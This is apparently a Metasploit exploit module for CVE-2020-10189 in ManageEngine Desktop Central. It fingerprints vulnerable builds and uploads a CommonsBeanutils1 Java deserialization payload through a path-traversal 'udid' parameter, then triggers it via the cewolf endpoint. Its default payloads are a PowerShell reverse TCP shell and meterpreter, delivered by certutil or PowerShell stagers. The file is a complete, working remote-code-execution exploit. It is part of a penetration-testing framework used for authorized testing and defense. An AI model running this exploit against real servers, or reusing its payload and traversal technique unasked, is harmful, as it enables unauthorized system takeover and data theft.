Path: blob/master/modules/exploits/windows/http/desktopcentral_deserialization.rb
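##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote

  Rank = GreatRanking

  # Desktop Central reports its version as a dotless build number, so build
  # 100474 is version 10.0.474 (where the vendor quote below places the file
  # upload fix) and 100479 is version 10.0.479 (the complete RCE fix).
  UPLOAD_FIX_BUILD = 100474
  COMPLETE_FIX_BUILD = 100479

  prepend Msf::Exploit::Remote::AutoCheck
  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::CmdStager
  include Msf::Exploit::FileDropper
  include Msf::Exploit::JavaDeserialization

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'ManageEngine Desktop Central Java Deserialization',
        'Description' => %q{
          This module exploits a Java deserialization vulnerability in the
          getChartImage() method from the FileStorage class within ManageEngine
          Desktop Central versions < 10.0.474. Tested against 10.0.465 x64.

          Quoting the vendor's advisory on fixed versions:

          "The short-term fix for the arbitrary file upload vulnerability was
          released in build 10.0.474 on January 20, 2020. In continuation of
          that, the complete fix for the remote code execution vulnerability is
          now available in build 10.0.479."
        },
        'Author' => [
          'mr_me', # Discovery and exploit
          'wvu' # Module
        ],
        'References' => [
          ['CVE', '2020-10189'],
          ['URL', 'https://srcincite.io/advisories/src-2020-0011/'],
          ['URL', 'https://srcincite.io/pocs/src-2020-0011.py.txt'],
          ['URL', 'https://twitter.com/steventseeley/status/1235635108498948096'],
          ['URL', 'https://www.manageengine.com/products/desktop-central/remote-code-execution-vulnerability.html']
        ],
        'DisclosureDate' => '2020-03-05', # 0day release
        'License' => MSF_LICENSE,
        'Platform' => 'win',
        'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64],
        'Privileged' => true,
        'Targets' => [
          [
            'Windows Command',
            {
              'Arch' => ARCH_CMD,
              'Type' => :win_cmd,
              'DefaultOptions' => {
                'PAYLOAD' => 'cmd/windows/powershell_reverse_tcp'
              }
            }
          ],
          [
            'Windows Dropper',
            {
              'Arch' => [ARCH_X86, ARCH_X64],
              'Type' => :win_dropper,
              'CmdStagerFlavor' => :certutil, # This works without issue
              'DefaultOptions' => {
                'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp'
              }
            }
          ],
          [
            'PowerShell Stager',
            {
              'Arch' => [ARCH_X86, ARCH_X64],
              'Type' => :psh_stager,
              'DefaultOptions' => {
                'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp'
              }
            }
          ]
        ],
        'DefaultTarget' => 2,
        'DefaultOptions' => {
          'SSL' => true,
          'WfsDelay' => 60 # It can take a little while to trigger
        },
        'Notes' => {
          'Stability' => [SERVICE_RESOURCE_LOSS], # May 404 the upload page?
          'Reliability' => [FIRST_ATTEMPT_FAIL], # Payload upload may fail
          'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]
        }
      )
    )

    register_options([
      Opt::RPORT(8383),
      OptString.new('TARGETURI', [true, 'Base path', '/'])
    ])
  end

  # Fingerprints the target by fetching configurations.do and reading the
  # build number embedded in the page.
  #
  # @return [Msf::Exploit::CheckCode] Unknown when there is no response or the
  #   page is not Desktop Central; Detected when the build cannot be read or
  #   falls between the upload fix and the complete fix; Appears when the
  #   build predates the upload fix; Safe otherwise
  def check
    res = send_request_cgi(
      'method' => 'GET',
      'uri' => normalize_uri(target_uri.path, 'configurations.do')
    )

    return CheckCode::Unknown('Target did not respond to check.') unless res

    unless res.code == 200 && res.body.include?('ManageEngine Desktop Central')
      return CheckCode::Unknown('Target is not running Desktop Central.')
    end

    # The build number is carried in a hidden input on the page
    build = res.get_html_document.at('//input[@id = "buildNum"]/@value')&.text

    unless build&.match?(/\d+/)
      return CheckCode::Detected(
        'Target did not respond with Desktop Central build.'
      )
    end

    # Take the first run of digits so a decorated value does not collapse to 0
    build_num = build[/\d+/].to_i

    if build_num < UPLOAD_FIX_BUILD
      return CheckCode::Appears(
        "Desktop Central #{build} is a vulnerable build."
      )
    end

    # Builds 10.0.474 through 10.0.478 closed the file upload this module
    # relies on, but the vendor places the complete fix for the
    # deserialization RCE in 10.0.479, so these are not reported as Safe.
    if build_num < COMPLETE_FIX_BUILD
      return CheckCode::Detected(
        "Desktop Central #{build} has the upload fix but predates the complete fix in 10.0.479."
      )
    end

    CheckCode::Safe("Desktop Central #{build} is NOT a vulnerable build.")
  end

  # Dispatches on the selected target's 'Type' metadata declared above.
  #
  # @raise [Msf::Exploit::Failed] via fail_with when the target carries a
  #   Type this dispatch does not know about
  def exploit
    print_status("Executing #{target.name} for #{datastore['PAYLOAD']}")

    case target['Type']
    when :win_cmd
      execute_command(payload.encoded)
    when :win_dropper
      execute_cmdstager
    when :psh_stager
      execute_command(cmd_psh_payload(
        payload.encoded,
        payload.arch.first,
        remove_comspec: true
      ))
    else
      # Every target in the table declares a Type; reaching here means the
      # table was edited without updating this dispatch
      fail_with(Failure::BadConfig, "Unknown target type: #{target['Type'].inspect}")
    end
  end

  # Builds the serialized Java object for +cmd+ and runs the two-step
  # upload/trigger sequence. The +_opts+ parameter is required by the
  # CmdStager mixin's calling convention and is unused here.
  #
  # @param cmd [String] command to embed in the gadget chain
  # @param _opts [Hash] ignored
  def execute_command(cmd, _opts = {})
    vprint_status("Executing command: #{cmd}")

    # I identified mr_me's binary blob as the CommonsBeanutils1 payload :)
    java_payload = generate_java_deserialization_for_command(
      'CommonsBeanutils1',
      'cmd',
      cmd
    )

    # XXX: Patch in expected serialVersionUID
    # NOTE(review): the offset assumes the layout of the payload as generated
    # above; a different generator output would put this patch in the wrong
    # place — confirm if the mixin's payload ever changes
    java_payload[140, 8] = "\xcf\x8e\x01\x82\xfe\x4e\xf1\x7e"

    # Rock 'n' roll!
    upload_serialized_payload(java_payload)
    deserialize_payload
  end

  # Writes +serialized_payload+ to the server and registers it for cleanup.
  #
  # @param serialized_payload [String] bytes to upload as-is
  # @raise [Msf::Exploit::Failed] via fail_with when the server does not
  #   answer 200
  def upload_serialized_payload(serialized_payload)
    print_status('Uploading serialized payload')

    res = send_request_cgi(
      'method' => 'POST',
      'uri' => normalize_uri(target_uri.path, '/mdm/client/v1/mdmLogUploader'),
      'ctype' => 'application/octet-stream',
      'vars_get' => {
        # Traversal from C:\Program Files\DesktopCentral_Server\mdm-logs\foo\bar
        'udid' => '\\..\\..\\..\\webapps\\DesktopCentral\\_chart',
        'filename' => 'logger.zip'
      },
      'data' => serialized_payload
    )

    unless res && res.code == 200
      fail_with(Failure::UnexpectedReply, 'Could not upload serialized payload')
    end

    print_good('Successfully uploaded serialized payload')

    # Shell lands in C:\Program Files\DesktopCentral_Server\bin
    register_file_for_cleanup('..\\webapps\\DesktopCentral\\_chart\\logger.zip')
  end

  # Requests the uploaded file through the cewolf endpoint so the server
  # deserializes it.
  #
  # @raise [Msf::Exploit::Failed] via fail_with when the server does not
  #   answer 200
  def deserialize_payload
    print_status('Deserializing payload')

    res = send_request_cgi(
      'method' => 'GET',
      'uri' => normalize_uri(target_uri.path, 'cewolf'),
      'vars_get' => {
        'img' => '\\logger.zip'
      }
    )

    unless res && res.code == 200
      fail_with(Failure::UnexpectedReply, 'Could not deserialize payload')
    end

    print_good('Successfully deserialized payload')
  end

end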